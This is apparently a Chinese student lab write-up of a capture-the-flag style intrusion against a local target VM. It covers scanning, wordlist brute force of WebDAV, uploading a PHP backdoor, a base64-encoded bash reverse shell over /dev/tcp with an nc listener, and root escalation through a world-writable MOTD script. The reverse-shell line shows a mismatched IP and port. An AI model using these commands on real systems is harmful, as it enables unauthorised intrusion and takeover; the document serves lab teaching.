远程控制技术和权限提升技术

一、实验目的

1、掌握远程控制的基本原理和技术实现

2、掌握使用MSFVENOM生成被控端的方法和远程控制工具MSF的使用;

3、掌握权限提升的一般方法。

二、实验任务

1、对目标靶机进行信息收集并分析研究可利用的漏洞;

2、利用MSFVENOM工具生成被控端;

3、上传文件反弹shell并利用 Metaspolit 对目标靶机进行渗透控制;

4、提升目标靶机的操作权限。

三、实验环境

1、靶机地址:192.168.137.131

2、攻击机地址:192.168.137.18

四、实验过程和实验结果

1.主机发现/端口扫描
(1)扫出靶机ip地址

命令:sudo arp-scan -l

  1. 用nmap进行端口和服务扫描

命令:nmap -sV -sC -p- 192.168.137.131

扫出了22端口和80端口,访问80端口

无可用信息

2.信息收集

dirsearch进行目录扫描

命令:dirsearch --url http://192.168.137.131

经过目录扫描,发现webdav的路径进行访问,发现需要登录

  1. 密码字典定制

用kali自带的字典生成工具cewl生成一个针对这个网站专属的字典进行测试

命令:cewl http://192.168.137.131 >words.dic

  1. hydra 进行爆破

命令:hydra -L words.dic -P words.dic http-get://192.168.137.131/webdav

成功登录

  1. 漏洞利用

利用cadaver登录webdav上传shell文件

命令:cadaver http://192.168.137.131/webdav

Put /usr/share/webshells/php/qsd-php-backdoor.php

网页访问文件目录,反弹shell

尝试用/bin/bash/进行一个交互式的bash shell 连接,监听端口为4444,并进行base64加密

命令:echo ‘/bin/bash -i >& /dev/tcp/192.168.137.131/444 0>&1’|base64

将base64加密后构建的一个交互式的bash shell连接语句在网站后门上输出,同时打开本地监听

命令:nc -lnvp 4444

已获得www-date用户的访问权限,进行下一步操作

切换到根目录-->系统信息收集-->linux系统重要目录文件内容查找

查看账户信息文件,权限过低无法查看/tec/shadow文件

查看靶机各个用户的家目录

在inferno用户的目录下发现user.txt文件,查看,得到一串MD5加密字符串

在/mnt目录下存在hell.sh,还存在creds.txt

将creds.txt文件里面的内容解密,得到webdav登录的账密

查看靶机的/mnt/hell.sh文件,发现hell加密字符串,是brainfuck语言

解密得到:chitragupt

推测该字符是某服务的账号密码,又知道inferno用户下有flag提示,应该是inferno用户的账密,又靶机开放22-ssh服务,那这应该是ssh服务的账密

尝试ssh账密登录

成功以inferno用户身份登录ssh

6.权限提升

查看00-header文件权限

发现此文件对各个用户的权限均为可读可写可执行

将提权命令写入该文件

重新登录inferno账户,即可触发脚本

登陆之后根据写入的密码,切换登录到root用户

切换到各个目录查看是否有敏感文件,在家目录下发现root.txt,查看内容

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值